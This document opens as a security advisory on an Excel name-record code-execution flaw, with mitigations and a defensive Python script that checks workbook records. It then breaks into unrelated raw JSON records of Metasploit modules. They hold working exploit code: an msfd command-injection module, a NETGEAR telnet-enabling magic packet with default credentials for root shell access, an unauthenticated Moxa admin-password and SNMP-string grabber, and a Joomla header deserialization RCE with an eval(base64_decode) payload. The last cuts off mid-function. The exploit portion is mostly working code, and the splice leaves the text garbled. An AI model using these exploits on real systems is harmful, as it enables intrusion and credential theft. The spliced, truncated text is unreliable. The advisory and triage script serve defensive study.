Microsoft Excel Name Record Array Remote Code Execution Vulnerability
Published: 2008-12-09
ID: SMNTC-32622 | Type: symantec | Reporter: Symantec Security Response | Modified: 2008-12-09
Description
Microsoft Excel is prone to a remote code-execution vulnerability in its handling of the array of name records in a workbook file. The issue is file-borne rather than network-borne: an attacker must entice the victim into opening a maliciously crafted Excel file, typically delivered as an email attachment or a web download. A successful exploit lets the attacker execute arbitrary code with the privileges of the user running Excel.
Technologies Affected
Microsoft Excel 2000 SP3
Microsoft Excel 2002 SP3
Microsoft Excel 2003 SP3
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Microsoft Office Excel Viewer 2003
Microsoft Office Excel Viewer 2003 SP3
Microsoft Open XML File Format Converter for Mac
Recommendations
Run all software as a nonprivileged user with minimal access rights.
Because the payload runs with the rights of whoever opened the file, running Excel under a standard, non-administrative account limits what a successful exploit can do. This reduces the impact of this issue and of any latent vulnerabilities in the application.
Do not accept or execute files from untrusted or unknown sources.
The vulnerability requires a crafted workbook to be opened. Refuse attachments and downloads that originate from unfamiliar or untrusted sources, and treat unexpected workbook attachments with suspicion even when the apparent sender is known, since sender addresses are easily forged.
Do not follow links provided by unknown or untrusted sources.
Be cautious about following links supplied by unfamiliar or suspicious sources, as they are a common way to deliver a malicious file. Filtering HTML from email removes one vector for transmitting such links to users.
Implement multiple redundant layers of security.
Because this issue can be leveraged to execute code, use memory-protection mechanisms such as a non-executable stack and heap (DEP) and randomized memory layout (ASLR). These do not remove the flaw, but they make reliable exploitation of a memory-corruption bug considerably harder.
Microsoft has released a security bulletin along with fixes that address this vulnerability. Applying the update is the actual fix; the measures above only reduce exposure until it is installed.
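The following Python triage script is an added example for this page; it is not part of the Symantec advisory and is not Microsoft or Symantec code. It walks a raw BIFF (legacy binary .xls) Workbook stream, the format in which Excel stores its defined-name (NAME, record id 0x0018) records, and flags any NAME record whose declared name length and formula length cannot fit inside the record that carries them, the kind of inconsistency a crafted file relies on to confuse a parser. The advisory does not say which field of the name record array triggers this particular bug, so this is a generic structural sanity check and not a signature for it. The sample stream at the bottom is constructed inline for demonstration; a real workbook keeps this stream inside an OLE2 compound file, and you would extract its "Workbook" stream first (for example with the third-party olefile library, which is assumed here and not shown) before passing the bytes to triage_name_records.

```python
import struct

# BIFF record ids in a BIFF5/BIFF8 Workbook stream. NAME (0x0018) is the
# defined-name ("Lbl") record that the advisory title refers to.
BIFF_BOF = 0x0809
BIFF_EOF = 0x000A
BIFF_NAME = 0x0018

# Fixed 14-byte header of a BIFF8 NAME record:
# grbit(2) chKey(1) cch(1) cce(2) ixals(2) itab(2)
# cchCustMenu(1) cchDescription(1) cchHelptopic(1) cchStatustext(1)
NAME_HDR = '<HBBHHHBBBB'
NAME_HDR_LEN = struct.calcsize(NAME_HDR)   # 14


def iter_biff_records(stream: bytes):
    """Walk a raw BIFF record stream, yielding (offset, record_id, payload).

    Each record is a 2-byte id, a 2-byte little-endian length, then the payload.
    Stops at the EOF record or at the end of the stream; a record whose declared
    length runs past the end of the stream raises ValueError (truncated file).
    """
    off = 0
    while off + 4 <= len(stream):
        rid, length = struct.unpack_from('<HH', stream, off)
        payload = stream[off + 4: off + 4 + length]
        if len(payload) != length:
            raise ValueError(f'record 0x{rid:04X} at offset {off} is truncated')
        yield off, rid, payload
        off += 4 + length
        if rid == BIFF_EOF:
            break


def check_name_record(payload: bytes) -> dict:
    """Sanity-check one NAME record.

    The name length (cch) and formula length (cce) that the record declares must
    fit inside the record's own payload. A record that claims more data than it
    carries is malformed and worth quarantining, whatever Excel's parser does
    with it. Only the plain (non rich-text) string variant is handled.
    """
    if len(payload) < NAME_HDR_LEN + 1:
        return {'ok': False, 'reason': 'header too short', 'actual': len(payload)}
    grbit, _chkey, cch, cce, _ixals, _itab, *_ = struct.unpack_from(NAME_HDR, payload, 0)
    str_flags = payload[NAME_HDR_LEN]            # XLUnicodeStringNoCch option byte
    if str_flags & 0x0C:                         # fExtSt / fRichSt add fields not parsed here
        return {'ok': None, 'reason': 'rich-text/extended string variant not handled',
                'actual': len(payload)}
    char_width = 2 if str_flags & 0x01 else 1    # fHighByte: UTF-16LE vs compressed 8-bit
    name_start = NAME_HDR_LEN + 1
    needed = name_start + cch * char_width + cce
    ok = needed <= len(payload)
    result = {'ok': ok, 'cch': cch, 'cce': cce, 'needed': needed, 'actual': len(payload),
              'hidden': bool(grbit & 0x0001)}    # fHidden: hidden names are a common malware tell
    if ok:
        raw = payload[name_start:name_start + cch * char_width]
        result['name'] = raw.decode('utf-16-le' if char_width == 2 else 'latin-1')
    else:
        result['reason'] = 'declared name/formula sizes exceed record length'
    return result


def triage_name_records(stream: bytes) -> list:
    """Return one check result per NAME record, in file order, with its stream offset."""
    return [dict(offset=off, **check_name_record(p))
            for off, rid, p in iter_biff_records(stream) if rid == BIFF_NAME]


def build_name_record(name: bytes, rgce: bytes, cce: int = None, hidden: bool = False) -> bytes:
    """Build a BIFF8 NAME record (test fixture). Passing cce forges a record that
    declares a longer formula than it actually carries."""
    cce = len(rgce) if cce is None else cce
    hdr = struct.pack(NAME_HDR, 0x0001 if hidden else 0, 0, len(name), cce, 0, 0, 0, 0, 0, 0)
    body = hdr + b'\x00' + name + rgce           # 0x00 = compressed 8-bit string
    return struct.pack('<HH', BIFF_NAME, len(body)) + body


# Constructed sample stream (not a real malicious file): a BOF record, a
# well-formed name "Total" = 1, a hidden name whose declared formula length
# (0x400 bytes) cannot fit in its 23-byte record, then EOF.
SAMPLE_STREAM = (
    struct.pack('<HH', BIFF_BOF, 16) + b'\x00' * 16          # BOF payload contents irrelevant here
    + build_name_record(b'Total', b'\x1e\x01\x00')           # rgce: PtgInt 1
    + build_name_record(b'Bad', b'\x1e\x01\x00', cce=0x0400, hidden=True)
    + struct.pack('<HH', BIFF_EOF, 0)
)

if __name__ == '__main__':
    for finding in triage_name_records(SAMPLE_STREAM):
        print(finding)
```

Run over a mail-gateway quarantine or an incident-response sample set, any record with ok=False (or a ValueError from a truncated stream) is reason enough to hold the file for manual analysis rather than deliver it; hidden names are reported because they are a frequent indicator of tampered workbooks even when the lengths are consistent.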
References
http://secunia.com/secunia_research/2008-36/
https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/32622
CVE: none recorded for this entry. CVSS: none recorded.
Code execution is achieved with the msfconsole command: irb -e 'CODE'.\n", "modified": "2018-04-27T23:35:30", "published": "2018-04-27T23:35:30", "id": "MSF:EXPLOIT/MULTI/MISC/MSFD_RCE_REMOTE", "href": "", "type": "metasploit", "title": "Metasploit msfd Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Metasploit msfd Remote Code Execution',\n 'Description' => %q{\n Metasploit's msfd-service makes it possible to get a msfconsole-like\n interface over a TCP socket. If this socket is accessible on a remote\n interface, an attacker can execute commands on the victim's machine.\n\n If msfd is running with higher privileges than the current local user,\n this module can also be used for privilege escalation. 
In that case,\n port forwarding on the compromised host can be used.\n\n Code execution is achieved with the msfconsole command: irb -e 'CODE'.\n },\n 'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',\n 'License' => BSD_LICENSE,\n 'Platform' => \"ruby\",\n 'Arch' => ARCH_RUBY,\n 'Payload' =>\n {\n 'Space' => 8192, # Arbitrary limit\n 'BadChars' => \"\\x27\\x0a\",\n 'DisableNops' => true\n },\n 'Targets' =>\n [\n [ 'Automatic', { } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Apr 11 2018', # Vendor notification\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(55554)\n ])\n end\n\n def check\n connect\n data = sock.get_once\n if data.include?(\"msf\")\n disconnect\n return Exploit::CheckCode::Appears\n end\n disconnect\n return Exploit::CheckCode::Unknown\n end\n\n def exploit\n connect\n sock.get_once\n sock.put \"irb -e '\" + payload.encoded + \"'\\n\"\n disconnect\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/misc/msfd_rce_remote.rb"}, {"lastseen": "2019-11-29T09:40:53", "bulletinFamily": "exploit", "description": "This module sends a magic packet to a NETGEAR device to enable telnetd. 
Upon successful connect, a root shell should be presented to the user.\n", "modified": "2019-03-06T03:02:39", "published": "2018-02-28T06:30:53", "id": "MSF:EXPLOIT/LINUX/TELNET/NETGEAR_TELNETENABLE", "href": "", "type": "metasploit", "title": "NETGEAR TelnetEnable", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Udp\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Capture\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'NETGEAR TelnetEnable',\n 'Description' => %q{\n This module sends a magic packet to a NETGEAR device to enable telnetd.\n Upon successful connect, a root shell should be presented to the user.\n },\n 'Author' => [\n 'Paul Gebheim', # Python PoC (TCP)\n 'insanid', # Python PoC (UDP)\n 'wvu' # Metasploit module\n ],\n 'References' => [\n ['URL', 'https://wiki.openwrt.org/toh/netgear/telnet.console'],\n ['URL', 'https://github.com/cyanitol/netgear-telenetenable'],\n ['URL', 'https://github.com/insanid/netgear-telenetenable']\n ],\n 'DisclosureDate' => '2009-10-30', # Python PoC (TCP)\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Privileged' => true,\n 'Payload' => {\n 'Compat' => {\n 'PayloadType' => 'cmd_interact',\n 'ConnectionType' => 'find'\n }\n },\n 'Targets' => [\n ['Automatic (detect TCP or UDP)',\n proto: :auto\n ],\n ['TCP (typically older devices)',\n proto: :tcp,\n username: 'Gearguy',\n password: 'Geardog'\n ],\n ['UDP (typically newer devices)',\n proto: :udp,\n username: 'admin',\n password: 'password'\n ]\n ],\n 'DefaultTarget' => 0\n ))\n\n register_options([\n Opt::RPORT(23),\n OptString.new('MAC', [false, 'MAC address of device']),\n OptString.new('USERNAME', [false, 'Username on device']),\n OptString.new('PASSWORD', [false, 'Password on device'])\n ])\n 
end\n\n def post_auth?\n true\n end\n\n def default_credential?\n true\n end\n\n def check\n # Run through protocol detection\n detect_proto\n\n # This is a gamble, but it's the closest we can get\n if @proto == :tcp\n CheckCode::Detected\n else\n CheckCode::Unknown\n end\n end\n\n def exploit\n # Try to do the exploit unless telnetd is detected\n @do_exploit = true\n\n # Detect TCP or UDP and presence of telnetd\n @proto = target[:proto]\n detect_proto if @proto == :auto\n\n if @do_exploit\n # Use supplied or ARP-cached MAC address\n configure_mac\n # Use supplied or default creds\n configure_creds\n # Shell it\n exploit_telnetenabled\n end\n\n # Connect to the shell\n connect_telnetd\n end\n\n def detect_proto\n begin\n connect\n\n res = begin\n sock.get_once || ''\n rescue EOFError\n ''\n end\n\n # telnetenabled returns no data, unlike telnetd\n if res.length == 0\n print_good('Detected telnetenabled on TCP')\n else\n print_good('Detected telnetd on TCP')\n @do_exploit = false\n end\n\n @proto = :tcp\n # It's UDP... and we may not get an ICMP error...\n rescue Rex::ConnectionError\n print_good('Detected telnetenabled on UDP')\n @proto = :udp\n ensure\n disconnect\n end\n end\n\n def configure_mac\n @mac = datastore['MAC']\n\n return if @mac\n\n print_status('Attempting to discover MAC address via ARP')\n\n begin\n open_pcap\n @mac = lookup_eth(rhost).first\n rescue RuntimeError => e\n fail_with(Failure::BadConfig, \"#{e}. 
Are you root?\")\n ensure\n close_pcap\n end\n\n if @mac\n print_good(\"Found MAC address #{@mac}\")\n else\n fail_with(Failure::Unknown, 'Could not find MAC address')\n end\n end\n\n def configure_creds\n @username = datastore['USERNAME'] || target[:username]\n @password = datastore['PASSWORD'] || target[:password]\n\n # Try to use default creds if no creds were found\n unless @username && @password\n tgt = targets.find { |t| t[:proto] == @proto }\n @username = tgt[:username]\n @password = tgt[:password]\n end\n\n print_good(\"Using creds #{@username}:#{@password}\")\n end\n\n def exploit_telnetenabled\n print_status('Generating magic packet')\n payload = magic_packet(@mac, @username, @password)\n\n begin\n print_status(\"Connecting to telnetenabled via #{@proto.upcase}\")\n @proto == :tcp ? connect : connect_udp\n print_status('Sending magic packet')\n @proto == :tcp ? sock.put(payload) : udp_sock.put(payload)\n rescue Rex::ConnectionError\n fail_with(Failure::Disconnected, 'Something happened mid-connection!')\n ensure\n print_status('Disconnecting from telnetenabled')\n @proto == :tcp ? 
disconnect : disconnect_udp\n end\n\n # Wait a couple seconds for telnetd to come up\n print_status('Waiting for telnetd')\n sleep(2)\n end\n\n def connect_telnetd\n print_status('Connecting to telnetd')\n connect\n handler(sock)\n end\n\n # NOTE: This is almost a verbatim copy of the Python PoC\n def magic_packet(mac, username, password)\n mac = mac.gsub(/[:-]/, '').upcase\n\n if mac.length != 12\n fail_with(Failure::BadConfig, 'MAC must be 12 bytes without : or -')\n end\n just_mac = mac.ljust(0x10, \"\\x00\")\n\n if username.length > 0x10\n fail_with(Failure::BadConfig, 'USERNAME must be <= 16 bytes')\n end\n just_username = username.ljust(0x10, \"\\x00\")\n\n if @proto == :tcp\n if password.length > 0x10\n fail_with(Failure::BadConfig, 'PASSWORD must be <= 16 bytes')\n end\n just_password = password.ljust(0x10, \"\\x00\")\n elsif @proto == :udp\n # Thanks to Roberto Frenna for the reserved field analysis\n if password.length > 0x21\n fail_with(Failure::BadConfig, 'PASSWORD must be <= 33 bytes')\n end\n just_password = password.ljust(0x21, \"\\x00\")\n end\n\n cleartext = (just_mac + just_username + just_password).ljust(0x70, \"\\x00\")\n md5_key = Rex::Text.md5_raw(cleartext)\n\n payload = byte_swap((md5_key + cleartext).ljust(0x80, \"\\x00\"))\n\n secret_key = 'AMBIT_TELNET_ENABLE+' + password\n\n byte_swap(blowfish_encrypt(secret_key, payload))\n end\n\n def blowfish_encrypt(secret_key, payload)\n cipher = OpenSSL::Cipher.new('bf-ecb').encrypt\n\n cipher.padding = 0\n cipher.key_len = secret_key.length\n cipher.key = secret_key\n\n cipher.update(payload) + cipher.final\n end\n\n def byte_swap(data)\n data.unpack('N*').pack('V*')\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/telnet/netgear_telnetenable.rb"}, {"lastseen": "2019-12-07T15:05:29", "bulletinFamily": "exploit", "description": "The Moxa protocol listens on 4800/UDP and will respond to 
broadcast or direct traffic. The service is known to be used on Moxa devices in the NPort, OnCell, and MGate product lines. Many devices with firmware versions older than 2017 or late 2016 allow admin credentials and SNMP read and read/write community strings to be retrieved without authentication. This module is the work of Patrick DeSantis of Cisco Talos and K. Reid Wightman. Tested on: Moxa NPort 6250 firmware v1.13, MGate MB3170 firmware 2.5, and NPort 5110 firmware 2.6.\n", "modified": "2018-10-10T21:56:17", "published": "2017-05-16T14:21:44", "id": "MSF:AUXILIARY/ADMIN/SCADA/MOXA_CREDENTIALS_RECOVERY", "href": "", "type": "metasploit", "title": "Moxa Device Credential Retrieval", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Udp\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Moxa Device Credential Retrieval',\n 'Description' => %q{\n The Moxa protocol listens on 4800/UDP and will respond to broadcast\n or direct traffic. The service is known to be used on Moxa devices\n in the NPort, OnCell, and MGate product lines. Many devices with\n firmware versions older than 2017 or late 2016 allow admin credentials\n and SNMP read and read/write community strings to be retrieved without\n authentication.\n\n This module is the work of Patrick DeSantis of Cisco Talos and K. Reid\n Wightman.\n\n Tested on: Moxa NPort 6250 firmware v1.13, MGate MB3170 firmware 2.5,\n and NPort 5110 firmware 2.6.\n\n },\n 'Author' =>\n [\n 'Patrick DeSantis <p[at]t-r10t.com>',\n 'K. 
Reid Wightman <reid[at]revics-security.com>'\n ],\n\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2016-9361'],\n [ 'BID', '85965'],\n [ 'URL', 'https://www.digitalbond.com/blog/2016/10/25/serial-killers/'],\n [ 'URL', 'https://github.com/reidmefirst/MoxaPass/blob/master/moxa_getpass.py' ],\n [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-336-02']\n ],\n 'DisclosureDate' => 'Jul 28 2015'))\n\n register_options([\n # Moxa protocol listens on 4800/UDP by default\n Opt::RPORT(4800),\n OptEnum.new(\"FUNCTION\", [true, \"Pull credentials or enumerate all function codes\", \"CREDS\",\n [\n \"CREDS\",\n \"ENUM\"\n ]])\n ])\n end\n\n def fc() {\n # Function codes\n 'ident' => \"\\x01\", # identify device\n 'name' => \"\\x10\", # get the \"server name\" of the device\n 'netstat' => \"\\x14\", # network activity of the device\n 'unlock1' => \"\\x16\", # \"unlock\" some devices, including 5110, MGate\n 'date_time' => \"\\x1a\", # get the device date and time\n 'time_server' => \"\\x1b\", # get the time server of device\n 'unlock2' => \"\\x1e\", # \"unlock\" 6xxx series devices\n 'snmp_read' => \"\\x28\", # snmp community strings\n 'pass' => \"\\x29\", # admin password of some devices\n 'all_creds' => \"\\x2c\", # snmp comm strings and admin password of 6xxx\n 'enum' => \"enum\" # mock fc to catch \"ENUM\" option\n }\n end\n\n def send_datagram(func, tail)\n if fc[func] == \"\\x01\"\n # identify datagrams have a length of 8 bytes and no tail\n datagram = fc[func] + \"\\x00\\x00\\x08\\x00\\x00\\x00\\x00\"\n begin\n udp_sock.put(datagram)\n response = udp_sock.get(3)\n rescue ::Timeout::Error\n end\n format_output(response)\n # the last 16 bytes of the ident response are used as a form of auth for\n # function codes other than 0x01\n tail = response[8..24]\n elsif fc[func] == \"enum\"\n for i in (\"\\x02\"..\"\\x80\") do\n # start at 2 since 0 is invalid and 1 is ident\n datagram = i + \"\\x00\\x00\\x14\\x00\\x00\\x00\\x00\" + tail\n begin\n 
udp_sock.put(datagram)\n response = udp_sock.get(3)\n end\n if response[1] != \"\\x04\"\n vprint_status(\"Function Code: #{Rex::Text.to_hex_dump(datagram[0])}\")\n format_output(response)\n end\n end\n else\n # all non-ident datagrams have a len of 14 bytes and include a tail that\n # is comprised of bytes obtained during the ident\n datagram = fc[func] + \"\\x00\\x00\\x14\\x00\\x00\\x00\\x00\" + tail\n begin\n udp_sock.put(datagram)\n response = udp_sock.get(3)\n if valid_resp(fc[func], response) == -1\n # invalid response, so don't bother trying to parse it\n return\n end\n if fc[func] == \"\\x2c\"\n # try this, note it may fail\n get_creds(response)\n end\n if fc[func] == \"\\x29\"\n # try this, note it may fail\n get_pass(response)\n end\n if fc[func] == \"\\x28\"\n # try this, note it may fail\n get_snmp_read(response)\n end\n rescue ::Timeout::Error\n end\n format_output(response)\n end\n end\n\n # helper function for extracting strings from payload\n def get_string(data)\n str_end = data.index(\"\\x00\")\n return data[0..str_end]\n end\n\n # helper function for extracting password from 0x29 FC response\n def get_pass(response)\n if response.length() < 200\n print_error(\"get_pass failed: response not long enough\")\n return\n end\n pass = get_string(response[200..-1])\n print_good(\"password retrieved: #{pass}\")\n store_loot(\"moxa.get_pass.admin_pass\", \"text/plain\", rhost, pass)\n return pass\n end\n\n # helper function for extracting snmp community from 0x28 FC response\n def get_snmp_read(response)\n if response.length() < 24\n print_error(\"get_snmp_read failed: response not long enough\")\n return\n end\n snmp_string = get_string(response[24..-1])\n print_good(\"snmp community retrieved: #{snmp_string}\")\n store_loot(\"moxa.get_pass.snmp_read\", \"text/plain\", rhost, snmp_string)\n end\n\n # helper function for extracting snmp community from 0x2C FC response\n def get_snmp_write(response)\n if response.length() < 64\n print_error(\"get_snmp_write 
failed: response not long enough\")\n return\n end\n snmp_string = get_string(response[64..-1])\n print_good(\"snmp read/write community retrieved: #{snmp_string}\")\n store_loot(\"moxa.get_pass.snmp_write\", \"text/plain\", rhost, snmp_string)\n end\n\n # helper function for extracting snmp and pass from 0x2C FC response\n # Note that 0x2C response is basically 0x28 and 0x29 mashed together\n def get_creds(response)\n if response.length() < 200\n # attempt failed. device may not be unlocked\n print_error(\"get_creds failed: response not long enough. Will fall back to other functions\")\n return -1\n end\n get_snmp_read(response)\n get_snmp_write(response)\n get_pass(response)\n end\n\n # helper function to verify that the response was actually for our request\n # Simply makes sure the response function code has most significant bit\n # of the request number set\n # returns 0 if everything is ok\n # returns -1 if functions don't match\n def valid_resp(func, resp)\n # get the query function code to an integer\n qfc = func.unpack(\"C\")[0]\n # make the response function code an integer\n rfc = resp[0].unpack(\"C\")[0]\n if rfc == (qfc + 0x80)\n return 0\n else\n return -1\n end\n end\n\n def format_output(resp)\n # output response bytes as hexdump\n vprint_status(\"Response:\\n#{Rex::Text.to_hex_dump(resp)}\")\n end\n def check\n connect_udp\n\n begin\n # send the identify command\n udp_sock.put(\"\\x01\\x00\\x00\\x08\\x00\\x00\\x00\\x00\")\n response = udp_sock.get(3)\n end\n\n if response\n # A valid response is 24 bytes, starts with 0x81, and contains the values\n # 0x00, 0x90, 0xe8 (the Moxa OIU) in bytes 14, 15, and 16.\n if response[0] == \"\\x81\" && response[14..16] == \"\\x00\\x90\\xe8\" && response.length == 24\n format_output(response)\n return Exploit::CheckCode::Appears\n end\n else\n vprint_error(\"Unknown response\")\n return Exploit::CheckCode::Unknown\n end\n cleanup\n\n Exploit::CheckCode::Safe\n end\n\n def run\n unless check == 
Exploit::CheckCode::Appears\n print_error(\"Aborted because the target does not seem vulnerable.\")\n return\n end\n\n function = datastore[\"FUNCTION\"]\n\n connect_udp\n\n # identify the device and get bytes for the \"tail\"\n tail = send_datagram('ident', nil)\n\n # get the \"server name\" from the device\n send_datagram('name', tail)\n\n # \"unlock\" the device\n # We send both versions of the unlock FC, this doesn't seem\n # to hurt anything on any devices tested\n send_datagram('unlock1', tail)\n send_datagram('unlock2', tail)\n\n if function == \"CREDS\"\n # grab data\n send_datagram('all_creds', tail)\n send_datagram('snmp_read', tail)\n send_datagram('pass', tail)\n elsif function == \"ENUM\"\n send_datagram('enum', tail)\n else\n print_error(\"Invalid FUNCTION\")\n end\n\n disconnect_udp\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/scada/moxa_credentials_recovery.rb"}, {"lastseen": "2019-11-25T20:45:53", "bulletinFamily": "exploit", "description": "Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5. By storing user supplied headers in the databases session table it's possible to truncate the input by sending an UTF-8 character. The custom created payload is then executed once the session is read from the database. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13. In later versions the deserialisation of invalid session data stops on the first error and the exploit will not work. 
The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.\n", "modified": "2017-08-29T00:17:58", "published": "2015-12-15T16:37:45", "id": "MSF:EXPLOIT/MULTI/HTTP/JOOMLA_HTTP_HEADER_RCE", "href": "", "type": "metasploit", "title": "Joomla HTTP Header Unauthenticated Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HTTP::Joomla\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Joomla HTTP Header Unauthenticated Remote Code Execution',\n 'Description' => %q{\n Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5.\n By storing user supplied headers in the databases session table it's possible to truncate the input\n by sending an UTF-8 character. The custom created payload is then executed once the session is read\n from the database. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13.\n In later versions the deserialisation of invalid session data stops on the first error and the\n exploit will not work. 
The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and\n 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.\n },\n 'Author'\t=>\n [\n 'Marc-Alexandre Montpas', # discovery\n 'Christian Mehlmauer' # metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2015-8562'],\n ['EDB', '38977'], # PoC from Gary\n ['EDB', '39033'], # Exploit modified to use \"X-Forwarded-For\" header instead of \"User-Agent\"\n ['URL', 'https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html'],\n ['URL', 'https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html'],\n ['URL', 'https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html'],\n ['URL', 'https://blog.patrolserver.com/2015/12/17/in-depth-analyses-of-the-joomla-0-day-user-agent-exploit/'],\n ['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fdrops.wooyun.org%2Fpapers%2F11330'],\n ['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fwww.freebuf.com%2Fvuls%2F89754.html'],\n ['URL', 'https://bugs.php.net/bug.php?id=70219']\n ],\n 'Privileged' => false,\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' => [['Joomla 1.5.0 - 3.4.5', {}]],\n 'DisclosureDate' => 'Dec 14 2015',\n 'DefaultTarget' => 0)\n )\n\n register_options(\n [\n OptEnum.new('HEADER', [ true, 'The header to use for exploitation', 'USER-AGENT', [ 'USER-AGENT', 'X-FORWARDED-FOR' ]])\n ])\n\n register_advanced_options(\n [\n OptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]),\n ])\n end\n\n def check\n res = send_request_cgi({'uri' => target_uri.path })\n\n unless res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n unless res.headers['X-Powered-By']\n vprint_error(\"Unable to determine the PHP version.\")\n return Exploit::CheckCode::Unknown\n end\n\n online = joomla_and_online?\n 
unless online\n vprint_error(\"Unable to detect joomla on #{target_uri.path}\")\n return Exploit::CheckCode::Safe\n end\n\n php_version, rest = res.headers['X-Powered-By'].scan(/PHP\\/([\\d\\.]+)(?:-(.+))?/i).flatten || ''\n version = Gem::Version.new(php_version)\n vulnerable = false\n\n # check for ubuntu and debian specific versions. Was fixed in\n # * 5.5.9+dfsg-1ubuntu4.13\n # * 5.3.10-1ubuntu3.20\n # * 5.4.45-0+deb7u1\n # Changelogs (search for CVE-2015-6835 or #70219):\n # http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.5.9+dfsg-1ubuntu4.13/changelog\n # http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.3.10-1ubuntu3.20/changelog\n # http://metadata.ftp-master.debian.org/changelogs/main/p/php5/php5_5.4.45-0+deb7u2_changelog\n if rest && rest.include?('ubuntu')\n sub_version = rest.scan(/^\\dubuntu([\\d\\.]+)/i).flatten.first || ''\n vprint_status(\"Found Ubuntu PHP version #{res.headers['X-Powered-By']}\")\n\n if version > Gem::Version.new('5.5.9')\n vulnerable = false\n elsif version == Gem::Version.new('5.5.9') && Gem::Version.new(sub_version) >= Gem::Version.new('4.13')\n vulnerable = false\n elsif version == Gem::Version.new('5.3.10') && Gem::Version.new(sub_version) >= Gem::Version.new('3.20')\n vulnerable = false\n else\n vulnerable = true\n end\n elsif rest && rest.include?('+deb')\n sub_version = rest.scan(/^\\d+\\+deb([\\du]+)/i).flatten.first || ''\n vprint_status(\"Found Debian PHP version #{res.headers['X-Powered-By']}\")\n\n if version > Gem::Version.new('5.4.45')\n vulnerable = false\n elsif version == Gem::Version.new('5.4.45') && sub_version != '7u1'\n vulnerable = false\n else\n vulnerable = true\n end\n else\n vprint_status(\"Found PHP version #{res.headers['X-Powered-By']}\")\n vulnerable = true if version <= Gem::Version.new('5.4.44')\n vulnerable = true if version.between?(Gem::Version.new('5.5.0'), Gem::Version.new('5.5.28'))\n vulnerable = true if version.between?(Gem::Version.new('5.6.0'), 
Gem::Version.new('5.6.12'))\n end\n\n unless vulnerable\n vprint_error('This module currently does not work against this PHP version')\n return Exploit::CheckCode::Safe\n end\n\n j_version = joomla_version\n unless j_version.nil?\n vprint_status(\"Detected Joomla version #{j_version}\")\n return Exploit::CheckCode::Appears if Gem::Version.new(j_version) < Gem::Version.new('3.4.6')\n end\n\n return Exploit::CheckCode::Detected if online\n\n Exploit::CheckCode::Safe\n end\n\n def get_payload(header_name)\n pre = \"#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|\"\n pre_pay = 'O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";'\n pay = \"eval(base64_decode($_SERVER['HTTP_#{header_name}']));JFactory::getConfig();exit;\"\n post_pay = '\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}'\n return 